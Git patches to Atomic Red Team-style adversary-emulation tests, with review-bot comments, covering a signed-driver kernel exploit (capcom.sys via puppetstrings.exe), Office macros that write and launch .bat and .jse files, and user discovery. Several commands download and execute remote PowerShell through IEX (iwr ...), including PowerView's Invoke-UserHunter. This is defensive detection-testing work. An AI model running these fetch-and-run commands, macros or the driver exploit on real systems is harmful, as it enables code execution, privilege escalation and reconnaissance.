diff --git a/atomics/T1014/T1014.yaml b/atomics/T1014/T1014.yaml index be1a5e72..5a467508 100644 --- a/atomics/T1014/T1014.yaml +++ b/atomics/T1014/T1014.yaml @@ -92,22 +92,39 @@ atomic_tests: auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae description: | This test exploits a signed driver to execute code in Kernel. + This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. + The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. - It would be wise if you only run this in a test environment + supported_platforms: - - windows + - windows + input_arguments: driver_path: - description: Path to the vulnerable driver + description: Path to a vulnerable driver type: Path default: C:\Drivers\driver.sys + puppetstrings_path: + description: Path of puppetstrings.exe + type: Path + default: PathToAtomicsFolder\T1014\bin\puppetstrings.exe + + dependency_executor_name: powershell + dependencies: + - description: | + puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) + prereq_command: | + if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}" + executor: - command: | - puppetstrings #{driver_path} name: command_prompt - + command: | + #{puppetstrings_path} #{driver_path} + elevation_required: true \ No newline at end of file From ffecea355a4048fedc4b88b3ef05e81df2b81dc3 Mon Sep 17 00:00:00 2001 
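Review bot: `get_prereq_command` fetches puppetstrings.exe with `Invoke-WebRequest` and `prereq_command` only checks `Test-Path`, so a swapped or corrupted binary at that URL would be accepted and then run with `elevation_required: true`; the description already carries `SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441` for the PoC, and if that is the hash of the bundled puppetstrings.exe the check can pin it: `if ((Test-Path #{puppetstrings_path}) -and ((Get-FileHash -Algorithm SHA1 #{puppetstrings_path}).Hash -eq 'DD8DA630C00953B6D5182AA66AF999B1E117F441')) {exit 0} else {exit 1}`. There is also no dependency on `driver_path` (default `C:\Drivers\driver.sys`), which the description says must be obtained separately, so a missing driver is only discovered when the executor runs; a second dependency with `if (Test-Path #{driver_path}) {exit 0} else {exit 1}` would surface that at prereq time. The hunk also ends with `\ No newline at end of file`; add a trailing newline after `elevation_required: true`.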
From: Brian Thacker Date: Mon, 30 Nov 2020 17:37:26 -0600 Subject: [PATCH 10/13] T1204.002 new atomic office bat (#1305) * Update T1204.002.yaml Added a new atomic to simulate an adversary using a malicious word doc to stage malicious .bat files in appdata then execute them. * Update T1204.002.yaml made default ms_office_version more robust to handle box with multiple versions of office. It will select the latest * Update T1204.002.yaml added in the description what the .bat does --- atomics/T1204.002/T1204.002.yaml | 35 ++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index c672a12a..23884776 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml 
@@ -139,3 +139,38 @@ atomic_tests: Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell +- name: Office launching .bat file from AppData + description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. + supported_platforms: + - windows + input_arguments: + bat_path: + description: Path to malicious .bat file + type: String + default: $env:temp+"\art1204.bat" + ms_office_version: + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + type: string + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] + ms_product: + description: Maldoc application Word or Excel + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: | + Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys + prereq_command: | + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } + get_prereq_command: | + $msword = New-Object -ComObject word.application + Stop-Process -Name WINWORD + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} + $bat_path = #{bat_path} + $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" + name: powershell From 7e10dda193afd43c8d38542b3f41a7db22170a4d Mon Sep 17 00:00:00 2001 
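Review bot: The new test has no `auto_generated_guid`, while the sibling tests in this file carry one (`auto_generated_guid: 3f3af983-...` and `add560ef-...` are visible in the next patch's context), so it cannot be addressed by GUID until one is added. `type: string` for `ms_office_version` is lower-case where `bat_path` and `ms_product` use `String`. The VBA macro runs `Shell("cmd.exe /c $bat_path ", vbNormalFocus)` with the path unquoted, so a temp path containing a space (for example a profile name with a space) is split by cmd.exe; wrap the path in doubled quotes inside the VBA string literal.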
From: Brian Thacker Date: Mon, 30 Nov 2020 18:27:55 -0600 Subject: [PATCH 11/13] Update T1204.002.yaml (#1307) Changed the ms_office_version argument on test 1-4 to pull the latest version of office from registry instead of defaulting to 16.0 Added cleanup commands to test 5 Changed commands in tests 1-4 to account for changes in ms_office_version --- atomics/T1204.002/T1204.002.yaml | 47 ++++++++++++++++++++------------ 1 file changed, 29 insertions(+), 18 deletions(-) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 23884776..e81b7f6e 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -6,7 +6,6 @@ atomic_tests: description: | This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. - This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader 
@@ -23,26 +22,29 @@ atomic_tests: type: String default: Word ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: String - default: "16.0" + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] dependency_executor_name: powershell dependencies: - description: | Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys prereq_command: | - If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } get_prereq_command: | $msword = New-Object -ComObject word.application Stop-Process -Name WINWORD executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" - Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" cleanup_command: | if (Test-Path #{jse_path}) { Remove-Item #{jse_path} } - Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore + $ms_office_version = #{ms_office_version} + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell - name: OSTap Payload Download auto_generated_guid: 
3f3af983-118a-4fa1-85d3-ba4daa739d80 
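Review bot: The rewritten cleanup keeps single quotes around the path, `Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\'`, so PowerShell does not expand `$ms_office_version`, the literal path never exists, and `-ErrorAction Ignore` hides the miss; the `AccessVBOM` value that grants macro access to the VBA object model is therefore left in place after the test. Before this patch the path used `#{ms_office_version}`, which the framework substitutes before execution, so single quotes were fine; now it needs double quotes: `Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\" -Name 'AccessVBOM' -ErrorAction Ignore`. The same single-quoted path appears in the cleanup of the `@@ -79,31 +81,33 @@`, `@@ -117,26 +121,29 @@` and `@@ -173,4 +180,8 @@` hunks in this patch.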
@@ -79,31 +81,33 @@ atomic_tests: type: String default: Word ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: String - default: "16.0" + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] dependency_executor_name: powershell dependencies: - description: | Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys prereq_command: | - If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } get_prereq_command: | $msword = New-Object -ComObject word.application Stop-Process -Name WINWORD executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" - Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" cleanup_command: | - Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore + $ms_office_version = #{ms_office_version} + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell - name: OSTAP JS version auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911 description: | Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript - 
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. supported_platforms: - windows 
@@ -117,26 +121,29 @@ atomic_tests: type: String default: Word ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: String - default: "16.0" + default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc) dependency_executor_name: powershell dependencies: - description: | Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys prereq_command: | - If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } + $ms_office_version = #{ms_office_version} + If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 } get_prereq_command: | $msword = New-Object -ComObject word.application Stop-Process -Name WINWORD executor: command: | IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + $ms_office_version = #{ms_office_version} $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" - Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}" + Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" cleanup_command: | + $ms_office_version = #{ms_office_version} if (Test-Path #{jse_path}) { Remove-Item #{jse_path} } - Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell - name: Office launching 
.bat file from AppData @@ -149,7 +156,7 @@ atomic_tests: type: String default: $env:temp+"\art1204.bat" ms_office_version: - description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" + description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. type: string default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0] ms_product: @@ -173,4 +180,8 @@ atomic_tests: $bat_path = #{bat_path} $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}" + cleanup_command: | + $ms_office_version = #{ms_office_version} + if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) } + Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore name: powershell From 9ca764c258d1b38229355a4679dfe2108d638fc5 Mon Sep 17 00:00:00 2001 From: Murat ERDEM <52467052+moncasp@users.noreply.github.com> Date: Tue, 1 Dec 2020 17:19:19 +0300 Subject: [PATCH 12/13] Update T1033.yml (#1308) i seen a small error and fixed it --- atomics/T1033/T1033.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index ff657bfb..fb390d76 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml 
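Review bot: In the `@@ -117,26 +121,29 @@` hunk the new `ms_office_version` default ends with `| Sort-Object -desc)` and omits the `[0]` index that the same default carries in the other three tests, so on a host with more than one Office version installed the variable holds an array and the registry paths and the `Invoke-MalDoc` version argument become something like `16.0 15.0`. Append `[0]` so the expression reads `... | Sort-Object -desc)[0]`, matching the other tests.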
@@ -23,7 +23,7 @@ atomic_tests: quser qwinsta.exe /server:#{computer_name} qwinsta.exe - for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt + for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt name: command_prompt - name: System Owner/User Discovery From 90cc72063a0d4e3c12d99c002893822cdc80c6b1 Mon Sep 17 00:00:00 2001 From: MrOrOneEquals1 Date: Tue, 1 Dec 2020 07:40:10 -0700 Subject: [PATCH 13/13] dummy PR to cause documentation to be rebuilt (#1309) --- atomics/T1033/T1033.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index fb390d76..7c2d3e0b 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -50,4 +50,3 @@ atomic_tests: command: | IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-UserHunter -Stealth -Verbose name: powershell -
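Review bot: `echo %j > computers.txt` in the changed `for /F` line uses `>`, which truncates the file on every loop iteration, so the file ends up holding only the last host that matched; the following line does the same with `> usernames.txt`. If the intent is to collect all matches, use `>>` in both places. Both files are written to the working directory; whether the test's cleanup removes them cannot be seen here, as the cleanup lies outside this hunk.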